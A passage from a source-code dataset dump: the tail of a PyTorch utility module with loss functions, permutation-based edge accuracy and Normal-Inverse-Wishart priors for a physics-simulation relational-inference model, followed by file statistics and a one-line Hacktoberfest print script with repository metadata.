KL_term = 1/2*(trace_term + error_term.sum(dim = 3)+logterm )
return (KL_term).sum() / (target.size(0) * target.size(1))
def get_deltax0(target):
"""
Gets the value of the mean change in position and velocity in the first timestep
:param target: tensor of all data points from simulation
target has dimensions [batch, particle, timestep, state]
:return: mean change in position and velocity over the first timestep
"""
# separate out the velocity and position terms
indices = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if target.is_cuda:
indices, indices_vel = indices.cuda(), indices_vel.cuda()
target_pos = torch.index_select(target, 3, indices)
# calculate the magnitude in change in displacement
deltax0 = (target_pos[:,:,1,:]-target_pos[:,:,0,:]).squeeze()
deltax0 = deltax0.norm(p=2 , dim = 2, keepdim=True)
target_vel = torch.index_select(target, 3, indices_vel)
# calculate the magnitude in the change in velocity
deltav0 = (target_vel[:, :, 1, :] - target_vel[:, :, 0, :]).squeeze()
deltav0 = deltav0.norm(p=2, dim=2, keepdim=True)
return deltax0.mean(), deltav0.mean()
def get_errorarray(phys_error_folder, comp_error_folder,data_folder = 'data', sim_folder = ''):
"""
:param phys_error_folder: folder containing the theoretical values of the physical error
:param comp_error_folder: folder containing the theoretical values of the computational error
:param data_folder: folder containing the data
:param sim_folder: folder containing the simulation data
:return: the array for the contribution to sigma prior due to computational and physical errors for position and velocity
"""
# phys_errors has shape [different_sigma, timestep]. Get them from their respective files
phys_errors_pos = np.load(path.join(data_folder, phys_error_folder, 'mse_model_pos.npy'))
phys_errors_vel = np.load(path.join(data_folder, phys_error_folder, 'mse_model_vel.npy'))
# array of sigma values used in phys_errors- different terms in dim 1
sigma = np.load(path.join(data_folder, phys_error_folder, 'sigma.npy'))
# comp_errors has shape [timestep] - we know what the comp error should follow
comp_errors_pos = np.load(path.join(data_folder, comp_error_folder, 'mse_model_pos.npy'))
comp_errors_vel = np.load(path.join(data_folder, comp_error_folder, 'mse_model_pos.npy'))
# index of current sigma: starts at smallest input value
sigma_current_pos = 0
sigma_current_vel = 0
# the data here is to recast the values calculated by the simulator into the range of the data in the model
loc_train = np.load(path.join(data_folder, sim_folder, 'loc_train.npy'))
vel_train = np.load(path.join(data_folder, sim_folder, 'vel_train.npy'))
loc_max = loc_train.max()
loc_min = loc_train.min()
vel_max = vel_train.max()
vel_min = vel_train.min()
# Normalize to [-1, 1]
phys_errors_vel = (phys_errors_vel - vel_min) * 2 / (vel_max - vel_min) - 1
comp_errors_vel = (comp_errors_vel - vel_min) * 2 / (vel_max - vel_min) - 1
phys_errors_pos = (phys_errors_pos - loc_min) * 2 / (loc_max - loc_min) - 1
comp_errors_pos = (comp_errors_pos - loc_min) * 2 / (loc_max - loc_min) - 1
sigma = (sigma - loc_min) * 2 / (loc_max - loc_min) - 1
delta_x_sqrd_array = []
delta_v_sqrd_array = []
offset_pos = 0
offset_vel = 0
# recursively build the array
for i in range(len(comp_errors_pos)):
delta_x_sqrd = comp_errors_pos[i] ** 2 + phys_errors_pos[sigma_current_pos, i-offset_pos] ** 2
delta_v_sqrd = comp_errors_vel[i] ** 2 + phys_errors_vel[sigma_current_vel, i - offset_vel] ** 2
# we have the max sigma so just use that
if (sigma_current_pos == len(sigma)-1):
delta_x_sqrd_array.append(delta_x_sqrd)
else:
# if the error is greater than sigma_0 we use this as the new sigma value for physical errors and start
# from the begining
if (delta_x_sqrd > sigma[sigma_current_pos+1] ** 2):
sigma_current_pos = sigma_current_pos + 1
delta_x_sqrd = comp_errors_pos[i] ** 2 + phys_errors_pos[sigma_current_pos, 0] ** 2
delta_x_sqrd_array.append(delta_x_sqrd)
offset_pos = i
else:
# in the case we do not need to use new sigma value just append value to array.
delta_x_sqrd_array.append(delta_x_sqrd)
# we have the max sigma so just use that
if (sigma_current_vel == len(sigma) - 1):
delta_v_sqrd_array.append(delta_v_sqrd)
else:
# if the error is greater than sigma_0 we use this as the new sigma value for physical errors and start
# from the begining
if (delta_v_sqrd > sigma[sigma_current_vel + 1] ** 2):
sigma_current_vel = sigma_current_vel + 1
delta_v_sqrd = comp_errors_vel[i] ** 2 + phys_errors_vel[sigma_current_vel, 0] ** 2
delta_v_sqrd_array.append(delta_v_sqrd)
offset_vel = i
else:
# in the case we do not need to use new sigma value just append value to array.
delta_v_sqrd_array.append(delta_v_sqrd)
# we have the max sigma so just use that
delta_x_sqrd_array = torch.FloatTensor(delta_x_sqrd_array)
delta_v_sqrd_array = torch.FloatTensor(delta_v_sqrd_array)
return delta_x_sqrd_array, delta_v_sqrd_array
def getsigma_target(target, phys_error_folder, comp_error_folder, data_folder = 'data', sim_folder = ''):
"""
:param target: tensor of all data points from simulation
target has dimensions [batch, particle, timestep, state]
:param phys_error_folder: folder containing the theoretical values of the physical error
:param comp_error_folder: folder containing the theoretical values of the computational error
:param data_folder: folder containing the data
:param sim_folder: folder containing the simulation data
:return: the array for the prior sigma tensor
"""
# gets the terms for the mean shift in position and velocity at the 1st timestep
deltax_0, deltav_0 = get_deltax0(target)
# gets the contribution due to errors
delta_x_error_array, delta_v_error_array = get_errorarray( phys_error_folder, comp_error_folder,data_folder, sim_folder)
if target.is_cuda:
delta_x_error_array, delta_v_error_array = delta_x_error_array.cuda(), delta_v_error_array.cuda()
delta_x_error_array, delta_v_error_array = Variable(delta_x_error_array), Variable(delta_v_error_array)
# deltax^2 = deltax_0 ^2 + delta_x from error considerations
delta_x_array = delta_x_error_array + deltax_0 ** 2
delta_v_array = delta_v_error_array + deltav_0 ** 2
delta_x_array = tile(delta_x_array.unsqueeze(1), 1, 2)
delta_v_array = tile(delta_v_array.unsqueeze(1), 1, 2)
# output is of shape [timestep, (x,y, vx, vy)] needs to be recast into correct shape before use
return torch.sqrt(torch.cat((delta_x_array, delta_v_array), dim = 1))
def KL_between_blocks(prob_list, num_atoms, eps=1e-16):
# Return a list of the mutual information between every block pair
KL_list = []
for i in range(len(prob_list)):
for j in range(len(prob_list)):
if i != j:
KL = prob_list[i] *( torch.log(prob_list[i] + eps) - torch.log(prob_list[j] + eps) )
KL_list.append( KL.sum() / (num_atoms * prob_list[i].size(0)) )
KL = prob_list[i] *( torch.log(prob_list[i] + eps) - torch.log( true_flip(prob_list[j],-1) + eps) )
KL_list.append( KL.sum() / (num_atoms * prob_list[i].size(0)) )
return KL_list
def decode_target( target, num_edge_types_list ):
target_list = []
base = np.prod(num_edge_types_list)
for i in range(len(num_edge_types_list)):
base /= num_edge_types_list[i]
target_list.append( target//base )
target = target % base
return target_list
def encode_target_list( target_list, edge_types_list ):
encoded_target = np.zeros( target_list[0].shape )
base = 1
for i in reversed(range(len(target_list))):
encoded_target += base*np.array(target_list[i])
base *= edge_types_list[i]
return encoded_target.astype('int')
def edge_accuracy_perm_NRI_batch(preds, target, num_edge_types_list):
# permutation edge accuracy calculator for the standard NRI model
# return the maximum accuracy of the batch over the permutations of the edge labels
# also returns a one-hot encoding of the number which represents this permutation
# also returns the accuracies for the individual factor graphs
_, preds = preds.max(-1) # returns index of max in each z_ij to reduce dim by 1
num_edge_types = np.prod(num_edge_types_list)
preds = np.eye(num_edge_types)[np.array(preds.cpu())] # this is nice way to turn integers into one-hot vectors
target = np.array(target.cpu())
perms = [p for p in permutations(range(num_edge_types))] # list of edge type permutations
# in the below, for each permutation of edge-types, permute preds, then take argmax to go from one-hot to integers
# then compare to target, compute accuracy
acc = np.array([np.mean(np.equal(target, np.argmax(preds[:,:,p], axis=-1),dtype=object)) for p in perms])
max_acc, idx = np.amax(acc), np.argmax(acc)
preds_deperm = np.argmax(preds[:,:,perms[idx]], axis=-1)
target_list = decode_target( target, num_edge_types_list )
preds_deperm_list = decode_target( preds_deperm, num_edge_types_list )
blocks_acc = [ np.mean(np.equal(target_list[i], preds_deperm_list[i], dtype=object),axis=-1)
for i in range(len(target_list)) ]
acc = np.mean(np.equal(target, preds_deperm ,dtype=object), axis=-1)
blocks_acc = np.swapaxes(np.array(blocks_acc),0,1)
idx_onehot = np.eye(len(perms))[np.array(idx)]
return acc, idx_onehot, blocks_acc
def edge_accuracy_perm_NRI(preds, targets, num_edge_types_list):
acc_batch, perm_code_onehot, acc_blocks_batch = edge_accuracy_perm_NRI_batch(preds, targets, num_edge_types_list)
acc = np.mean(acc_batch)
acc_var = np.var(acc_batch)
acc_blocks = np.mean(acc_blocks_batch, axis=0)
acc_var_blocks = np.var(acc_blocks_batch, axis=0)
return acc, perm_code_onehot, acc_blocks, acc_var, acc_var_blocks
def edge_accuracy_perm_fNRI_batch(preds_list, targets, num_edge_types_list):
# permutation edge accuracy calculator for the fNRI model
# return the maximum accuracy of the batch over the permutations of the edge labels
# also returns a one-hot encoding of the number which represents this permutation
# also returns the accuracies for the individual factor graphs
target_list = [ targets[:,i,:].cpu() for i in range(targets.shape[1])]
preds_list = [ pred.max(-1)[1].cpu() for pred in preds_list]
preds = encode_target_list(preds_list, num_edge_types_list)
target = encode_target_list(target_list, num_edge_types_list)
target_list = [ np.array(t.cpu()).astype('int') for t in target_list ]
num_edge_types = np.prod(num_edge_types_list)
preds = np.eye(num_edge_types)[preds] # this is nice way to turn integers into one-hot vectors
perms = [p for p in permutations(range(num_edge_types))] # list of edge type permutations
# in the below, for each permutation of edge-types, permute preds, then take argmax to go from one-hot to integers
# then compare to target to compute accuracy
acc = np.array([np.mean(np.equal(target, np.argmax(preds[:,:,p], axis=-1),dtype=object)) for p in perms])
max_acc, idx = np.amax(acc), np.argmax(acc)
preds_deperm = np.argmax(preds[:,:,perms[idx]], axis=-1)
preds_deperm_list = decode_target( preds_deperm, num_edge_types_list )
blocks_acc = [ np.mean(np.equal(target_list[i], preds_deperm_list[i], dtype=object),axis=-1)
for i in range(len(target_list)) ]
acc = np.mean(np.equal(target, preds_deperm ,dtype=object), axis=-1)
blocks_acc = np.swapaxes(np.array(blocks_acc),0,1)
idx_onehot = np.array([0])#np.eye(len(perms))[np.array(idx)]
return acc, idx_onehot, blocks_acc
def edge_accuracy_perm_fNRI_batch_skipfirst(preds_list, targets, num_factors):
# permutation edge accuracy calculator for the fNRI model when using skip-first argument
# and all factor graphs have two edge types
# return the maximum accuracy of the batch over the permutations of the edge labels
# also returns a one-hot encoding of the number which represents this permutation
# also returns the accuracies for the individual factor graphs
targets = np.swapaxes(np.array(targets.cpu()),1,2)
preds = torch.cat( [ torch.unsqueeze(pred.max(-1)[1],-1) for pred in preds_list], -1 )
preds = np.array(preds.cpu())
perms = [p for p in permutations(range(num_factors))]
acc = np.array([np.mean( np.sum(np.equal(targets, preds[:,:,p],dtype=object),axis=-1)==num_factors ) for p in perms])
max_acc, idx = np.amax(acc), np.argmax(acc)
preds_deperm = preds[:,:,perms[idx]]
blocks_acc = np.mean(np.equal(targets, preds_deperm, dtype=object),axis=1)
acc = np.mean( np.sum(np.equal(targets, preds_deperm,dtype=object),axis=-1)==num_factors, axis=-1)
idx_onehot = np.eye(len(perms))[np.array(idx)]
return acc, idx_onehot, blocks_acc
def edge_accuracy_perm_fNRI(preds_list, targets, num_edge_types_list, skip_first=False):
if skip_first and all(e == 2 for e in num_edge_types_list):
acc_batch, perm_code_onehot, acc_blocks_batch = edge_accuracy_perm_fNRI_batch_skipfirst(preds_list, targets, len(num_edge_types_list))
else:
acc_batch, perm_code_onehot, acc_blocks_batch = edge_accuracy_perm_fNRI_batch(preds_list, targets, num_edge_types_list)
acc = np.mean(acc_batch)
acc_var = np.var(acc_batch)
acc_blocks = np.mean(acc_blocks_batch, axis=0)
acc_var_blocks = np.var(acc_blocks_batch, axis=0)
return acc, perm_code_onehot, acc_blocks, acc_var, acc_var_blocks
def edge_accuracy_perm_sigmoid_batch(preds, targets):
# permutation edge accuracy calculator for the sigmoid model
# return the maximum accuracy of the batch over the permutations of the edge labels
# also returns a one-hot encoding of the number which represents this permutation
# also returns the accuracies for the individual factor graph_list
targets = np.swapaxes(np.array(targets.cpu()),1,2)
preds = np.array(preds.cpu().detach())
preds = np.rint(preds).astype('int')
num_factors = targets.shape[-1]
perms = [p for p in permutations(range(num_factors))] # list of edge type permutations
# in the below, for each permutation of edge-types, permute preds, then take argmax to go from one-hot to integers
# then compare to target to compute accuracy
acc = np.array([np.mean( np.sum(np.equal(targets, preds[:,:,p],dtype=object),axis=-1)==num_factors ) for p in perms])
max_acc, idx = np.amax(acc), np.argmax(acc)
preds_deperm = preds[:,:,perms[idx]]
blocks_acc = np.mean(np.equal(targets, preds_deperm, dtype=object),axis=1)
acc = np.mean( np.sum(np.equal(targets, preds_deperm,dtype=object),axis=-1)==num_factors, axis=-1)
idx_onehot = np.eye(len(perms))[np.array(idx)]
return acc, idx_onehot, blocks_acc
def edge_accuracy_perm_sigmoid(preds, targets):
acc_batch, perm_code_onehot, acc_blocks_batch= edge_accuracy_perm_sigmoid_batch(preds, targets)
acc = np.mean(acc_batch)
acc_var = np.var(acc_batch)
acc_blocks = np.mean(acc_blocks_batch, axis=0)
acc_var_blocks = np.var(acc_blocks_batch, axis=0)
return acc, perm_code_onehot, acc_blocks, acc_var, acc_var_blocks
def initsigma(batchsize, time, anisotropic, noofparticles, initvar, ani_dims = 4):
"""
initialises a Tensor of sigma values of size [batchsize, no. of particles, time,no. of axes (isotropic = 1,
anisotropic = 4 (or 2 for semiisotropic))]
:param batchsize: size of the batch dimension. Int
:param time: size of the timestep dimension. Int
:param anisotropic: if it is anisotropic or not. Boolean
:param noofparticles: size of the particles dimension. Int
:param initvar: value of the initial variance. Float
:param ani_dims: dimensions that the anisotropic should have (default = 4)
:return: tensor of dimension [batchsize, noofparticles, time, ani_dims(or 1 if anisotropic = False)] with initvar at
each point
"""
if anisotropic:
ani = ani_dims
else:
ani = 1
# create numpy array of appropriate size
sigma = np.zeros((batchsize, noofparticles, time, ani), dtype = np.float32)
for i in range(len(sigma)):
for j in range(len(sigma[i])):
for l in range(len(sigma[i][j])):
for m in range(len(sigma[i][j][l])):
sigma[i][j][l][m] = np.float32(initvar)
return torch.from_numpy(sigma)
def tile(a, dim, n_tile):
""""
Taken from: https://discuss.pytorch.org/t/how-to-tile-a-tensor/13853/3
tiles the data along dimension dim
:param a: tensor to be tiled
:param dim: dimension along which the tiling is to be done
:param n_tile: number of times the tiling should be done along dimension dim
:returns: tiled tensor
"""
init_dim = a.size(dim)
repeat_idx = [1] * a.dim()
repeat_idx[dim] = n_tile
a = a.repeat(*(repeat_idx))
order_index = torch.LongTensor(np.concatenate([init_dim * np.arange(n_tile) + i for i in range(init_dim)]))
if a.is_cuda:
order_index = order_index.cuda()
return torch.index_select(a, dim, order_index)
# takes a tensor and applies a softplus (y=ln(1+e^beta*x)/beta) function to each of the components
def softplus(tensor, beta = 1.0):
return F.softplus(Variable(tensor * beta)).data / beta
# inverse of temperature dependent softplus function above
def inversesoftplus(x, beta = 1.0):
intermediate = abs(1-np.exp(beta * x))
return np.log(intermediate) / beta
# returns a gaussian with mean and sigma
def gaussian(x, amplitude, mean, sigma):
return amplitude * np.exp(-(x-mean) ** 2 / (2 * sigma ** 2))
# returns a lorentzian
def lorentzian(x, amplitude, mean, gamma):
return amplitude * gamma ** 2 / (gamma ** 2 + (x - mean) ** 2)
# calculates sigmoid
def sigmoid(epochs, epochs_mid, temperature):
return 1/(1+np.exp(-(epochs-epochs_mid)/temperature))
# calculates exponential
def exp(x, amp, alpha, const):
return amp*0.0000001 * np.exp(alpha * x) + const
class NormalInverseWishart(object):
"""implementation based on formulae found in:
https://www.cs.cmu.edu/~epxing/Class/10701-12f/recitation/mle_map_examples.pdf
Note that in this implementation 1/beta -> beta as the formulae are easier with this change
the Normal Inverse Wishart is the conjugate prior to the multivariate
Normal distribution for unknown mean and covariance matrix.
Parameters:
:param mu: tensor of coords: [batchsize, particle, timestep, (x,y) or (v_x,v_y)]
:param beta: no. of samples to get mean
:param nu: no. of samples to get covariance matrix: must be >d-1 where d = dim(mu(3))
:param Psi: tensor of dimensionality [batchsize, particle, timestep, 2, 2]
"""
def __init__(self, mu, beta, nu, psi):
self.mu = mu
self.beta = beta
self.nu = nu
self.psi = psi
self.inv_psi = torch.inverse(psi)
def getterms(self):
"""
:return: all the parameters of the distribution
"""
return(self.mu , self.beta, self.nu, self.psi)
def posterior(self, observation):
"""
:param observation: must have the same dimensions as mu except in the timestep dimension. The sampled
observation of the distribution. Valid for all slicing except dont_split_data slicing.
:return: The posterior distribution using the current distribution as a prior and observation as the values of
of the observed distribution
"""
# data is a single vector => n =1
timesteps = observation.shape[2]
muprime = (self.beta * self.mu[:,:, -timesteps:, :] + observation) / (self.beta + 1)
betaprime = self.beta + 1
nuprime = self.nu + 2
mean_error = observation - self.mu[:,:,-timesteps:,:]
mean_error_T = mean_error.unsqueeze(4)
mean_error = mean_error.unsqueeze(3)
psiprime = self.psi[:,:,-timesteps:,:,:] + (self.beta * torch.matmul(mean_error_T, mean_error)) / (self.beta + 1)
return NormalInverseWishart(muprime, betaprime, nuprime, psiprime)
def batch_diagonal(input):
'''
# Taken from https://github.com/pytorch/pytorch/issues/12160
# idea from here: https://discuss.pytorch.org/t/batch-of-diagonal-matrix/13560
'''
# batches a stack of vectors (batch x N) -> a stack of diagonal matrices (batch x N x N)
# works in 2D -> 3D, should also work in higher dimensions
# make a zero matrix, which duplicates the last dim of input
dims = [input.size(i) for i in torch.arange(input.dim())]
dims.append(dims[-1])
output = torch.zeros(dims)
# stride across the first dimensions, add one to get the diagonal of the last dimension
strides = [output.stride(i) for i in torch.arange(input.dim() - 1 )]
strides.append(output.size(-1) + 1)
# stride and copy the imput to the diagonal
output.as_strided(input.size(), strides ).copy_(input)
return output
def getpriorcovmat(target, sigmatarget, nu = 6):
"""
:param target: target data of size [batch, particles, timesteps, 2]
:param sigmatarget: prior sigma tensor of dimensions [1, 1, timesteps, 2]
:param nu: number of samples used to get an estimate for the covariance matrix (default =6). Should be > 1 - same
as nu hyperparameter in normal-Inverse-Wishart distribution
:return: estimate for the prior covariance matrix
"""
# covariance matrix
covmat = torch.matmul(batch_diagonal(sigmatarget), batch_diagonal(sigmatarget))
# sample nu times from the distribution
sample = np.empty((target.size(0), target.size(1), target.size(2), nu, target.size(3)))
for i in range(target.size(0)):
for j in range(target.size(1)):
for k in range(target.size(2)):
samples = np.random.multivariate_normal(target.detach().cpu().numpy()[i][j][k], covmat.detach().cpu().numpy()[0][0][k], size = nu)
sample[i][j][k] = samples
sample = sample.astype(np.single)
sample = torch.from_numpy(sample)
if target.is_cuda:
sample = sample.cuda()
target = tile(target.unsqueeze(dim = 3), dim = 3, n_tile = nu)
# get a measure for the covariance matrix from the samples as 1/nu-1 * sum((x_i-xbar)^T(x_i-xbar))
covmatapprox = torch.matmul((sample - target).unsqueeze(5), (sample - target).unsqueeze(4)).sum(dim = 3)/(nu -1)
return covmatapprox
def getpriordist(target, sigmatarget, nu = 6):
"""
:param target: target data of size [batch, particles, timesteps, 2]
:param sigmatarget: prior sigma tensor of dimensions [batch, particles, timesteps, 2]
:param nu: number of samples used to get an estimate for the covariance matrix (default =6). Should be > 1 - same
as nu hyperparameter in normal-Inverse-Wishart distribution
:return: Prior distribution for this batch
"""
convmat = getpriorcovmat(target, sigmatarget, nu)
psi = nu * convmat
# beta = no. of samples to get the mean. In our case this is always 1
beta = 1
return NormalInverseWishart(target, beta, nu, psi)
def nll_second_term_loss(dim_preds, dim_target, dim_covmat, dim_direction, beta):
"""
:param dim_preds: The predictions along the dimension of interest, output of NN. Size [batch, particles, timesteps, 2]
:param dim_target: The target along the dimension of interest, mu_dim. Size [batch, particles, timesteps, 2]
:param dim_covmat: The covariance matrix along the dimensions of interest. Size [batch, particles, timesteps, 2, 2]
:param dim_direction: The velocity/acceleration direction. Size [batch, particles, timesteps, 2]
:param beta: the value of beta of the posterior distribution. Type float and beta > 0
:return: neg_log_loss: loss term for (x-mu)^T(1/beta Sigma ^-1)(x-mu) term
"""
# t = time.time()
dimnorm = dim_direction.norm(p=2, dim=3, keepdim=True)
normaliseddim = dim_direction.div(dimnorm.expand_as(dim_direction))
# 1/sqrt(2) - isotropic => direction unimportant. chosen here to improve efficiency
normaliseddim[torch.isnan(normaliseddim)] = np.power(1 / 2, 1 / 2)
# ti = time.time()
if beta < pow(10, -3):
beta = pow(10, -3)
# gets scaled covariance matrix
dim_covmat = dim_covmat / beta
dim_covmat = dim_covmat.reshape(dim_covmat.size(0), dim_covmat.size(1), dim_covmat.size(2), 4)
indices_sigma = torch.LongTensor([0, 3])
indices_diag_1 = torch.LongTensor([1, 2])
if dim_preds.is_cuda:
indices_sigma, indices_diag_1 = indices_sigma.cuda(), indices_diag_1.cuda()
# extract variance
var_pos = torch.index_select(dim_covmat, 3, indices_sigma)
offdiag_pos = torch.index_select(dim_covmat, 3, indices_diag_1)
# ensures variance does not go to 0
if (torch.min(var_pos) < pow(10, -14)):
accuracy = np.full((var_pos.size(0), var_pos.size(1), var_pos.size(2), var_pos.size(3)),
pow(10, -14), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if dim_preds.is_cuda:
accuracy = accuracy.cuda()
var_pos = torch.max(var_pos, accuracy)
indices_1 = torch.LongTensor([0])
indices_2 = torch.LongTensor([1])
if dim_preds.is_cuda:
indices_1, indices_2 = indices_1.cuda(), indices_2.cuda()
# recasts the variance into desired form
variance_pos = torch.cat((torch.cat((torch.index_select(var_pos, 3, indices_1), offdiag_pos), 3),
torch.index_select(var_pos, 3, indices_2)), 3)
dim_covmat = variance_pos.reshape(variance_pos.size(0), variance_pos.size(1), variance_pos.size(2), 2, 2)
# inverse of the covariance matrix
inversevariance = dim_covmat.inverse()
# if np.isnan(np.sum(inversevariance.cpu().detach().numpy())):
# print("Some values from variance are nan")
# need position and velocity differences in (x,y) coordinates
differences = dim_preds - dim_target
differences = differences.unsqueeze(4)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
# the matrix multiplication for multivariate case can be thought of as taking a projection of the error vector
# along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2 along that
# direction. This follows directly from the fact the rotation matrix is orthogonal.
# multime = time.time()
# surprisingly it is more efficient to calculate the perpendicular term by considering
# (position_differences - (position_differences.v||)v||).vperp to get the position differences in the perpendicular
# direction than using rotation (x,y) -> (-y,x) as the triple for loop is inefficient. about 100x faster this way
# and almost as fast as isotropic
errorvectorparalleltov = torch.matmul(normaliseddim.unsqueeze(3), differences)
parallelterm = torch.matmul(normaliseddim.unsqueeze(4), errorvectorparalleltov)
perpterm = (differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
# NaN can occur when dividing by 0 (see comment below) but the problem with replacing NaN after the division is that
# the NaN carries through anyway - the function that the system is backtracking through keeps the NaN =
# therefore leads to NaN errors on the second pass of the function - replacing the 0's before division solves this
# issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if dim_preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN can occur when perpterm is 0, this means that preds-true = (preds-true).v|| v||
# i.e. error entirely in parallel direction and no error perpendicular: so we set these terms to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
indices_vpar = torch.LongTensor([0])
indices_vperp = torch.LongTensor([1])
# print('matrixmult: {:.1f}s'.format(time.time() - multime))
if dim_preds.is_cuda:
indices_vpar, indices_vperp = indices_vpar.cuda(), indices_vperp.cuda()
# t = time.time()
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(
torch.index_select(inversevariance, 3, indices_vpar), 4, indices_vpar).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(
torch.index_select(inversevariance, 3, indices_vperp), 4, indices_vperp).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov
return neg_log_loss
def nll_Normal_Inverse_WishartLoss(preds, sigma, accel, vel, prior_pos, prior_vel):
"""
Loss function derived: https://www.cs.cmu.edu/~epxing/Class/10701-12f/recitation/mle_map_examples.pdf
The posterior distribution is used to find a loss function that needs to be minimised
Parameters:
preds = prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
sigma = values of uncertainty of size [batch, particles, timesteps, 4]
accel = gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
vel = gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
prior_pos = The prior distribution on the positions. Here assumed to be NormalInverseWishart
prior_vel = The prior distribution on the velocities. Here assumed to be NormalInverseWishart
target is implicitly in prior
"""
# 2 dimensional terms for (x,y) and (vx,vy)
d = 2
# separate the positions and velocities
indices_pos = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
pos_preds = torch.index_select(preds, 3, indices_pos)
vel_preds = torch.index_select(preds, 3, indices_vel)
pos_sigma = torch.index_select(sigma, 3, indices_pos)
vel_sigma = torch.index_select(sigma, 3, indices_vel)
# get the posterior distribution
pos_posterior = prior_pos.posterior(pos_preds)
vel_posterior = prior_vel.posterior(vel_preds)
mu_pos, beta_pos, nu_pos, psi_pos = pos_posterior.getterms()
mu_vel, beta_vel, nu_vel, psi_vel = vel_posterior.getterms()
# get the covariance matrices from the NN output
pos_covmat = torch.matmul(batch_diagonal(pos_sigma), batch_diagonal(pos_sigma))
vel_covmat = torch.matmul(batch_diagonal(vel_sigma), batch_diagonal(vel_sigma))
if preds.is_cuda:
pos_covmat , vel_covmat = pos_covmat.cuda(), vel_covmat.cuda()
# calculate the loss function given in the reference
loss_term_1_pos = (nu_pos + d + 2) * torch.log(pos_covmat.det())
loss_term_1_vel = (nu_vel + d + 2) * torch.log(vel_covmat.det())
inv_pos_covmat = torch.inverse(pos_covmat)
inv_vel_covmat = torch.inverse(vel_covmat)
# to do- there must be a better way to batch trace
loss_term_3_pos = torch.matmul(psi_pos, inv_pos_covmat)
loss_term_3_pos = loss_term_3_pos[:,:,:,0,0] + loss_term_3_pos[:,:,:,1,1]
loss_term_3_vel = torch.matmul(psi_vel, inv_vel_covmat)
loss_term_3_vel = loss_term_3_vel[:,:,:,0,0] + loss_term_3_vel[:,:,:,1,1]
loss_term_2_pos = nll_second_term_loss(pos_preds, mu_pos, pos_covmat, vel, beta_pos)
loss_term_2_vel = nll_second_term_loss(vel_preds, mu_vel, vel_covmat, accel, beta_vel)
loss = loss_term_1_pos + loss_term_1_vel + loss_term_2_pos + loss_term_2_vel + loss_term_3_pos + loss_term_3_vel
return loss.sum() / (preds.size(0) * preds.size(1)), ((loss).sum(dim=1)/preds.size(1)).var()
# initialises a Tensor of log(sigma^2) values of size [batchsize, no. of particles, time,no. of axes (isotropic = 1, anisotropic = 4)]
def initlogsigma(batchsize, time, anisotropic, noofparticles, initvar):
if anisotropic:
ani = 4
else:
ani = 1
sigma = np.zeros((batchsize, noofparticles, time, ani), dtype = np.float32)
for i in range(len(sigma)):
for j in range(len(sigma[i])):
for l in range(len(sigma[i][j])):
for m in range(len(sigma[i][j][l])):
sigma[i][j][l][m] = np.log(np.float32(initvar) ** 2)
return torch.from_numpy(sigma) | 55.19436 | 207 | 0.688681 | 17,911 | 127,223 | 4.730612 | 0.047345 | 0.010858 | 0.020205 | 0.022306 | 0.841178 | 0.824808 | 0.811932 | 0.800921 | 0.789791 | 0.783146 | 0 | 0.023589 | 0.199296 | 127,223 | 2,305 | 208 | 55.19436 | 0.808173 | 0.34614 | 0 | 0.686534 | 0 | 0 | 0.004594 | 0 | 0 | 0 | 0 | 0 | 0.000736 | 1 | 0.055188 | false | 0 | 0.007358 | 0.003679 | 0.116998 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b90ad32ab8a7ec05e494fe06559e8933d072f4fa | 49 | py | Python | hacktoberfest.py | sumon328/Hacktoberfest_contribution_2021 | 25200d91ffa43a50f48764901ede1bf9c359119d | [
"Apache-2.0"
] | null | null | null | hacktoberfest.py | sumon328/Hacktoberfest_contribution_2021 | 25200d91ffa43a50f48764901ede1bf9c359119d | [
"Apache-2.0"
] | 2 | 2021-10-16T18:28:44.000Z | 2021-10-18T10:46:42.000Z | hacktoberfest.py | sumon328/Hacktoberfest_contribution_2021 | 25200d91ffa43a50f48764901ede1bf9c359119d | [
"Apache-2.0"
] | 6 | 2021-10-03T05:48:18.000Z | 2021-10-31T13:35:03.000Z | print(''' Welcome To hactoberfest 2021
'''*1000)
| 16.333333 | 38 | 0.693878 | 6 | 49 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 0.122449 | 49 | 2 | 39 | 24.5 | 0.604651 | 0 | 0 | 0 | 0 | 0 | 0.612245 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
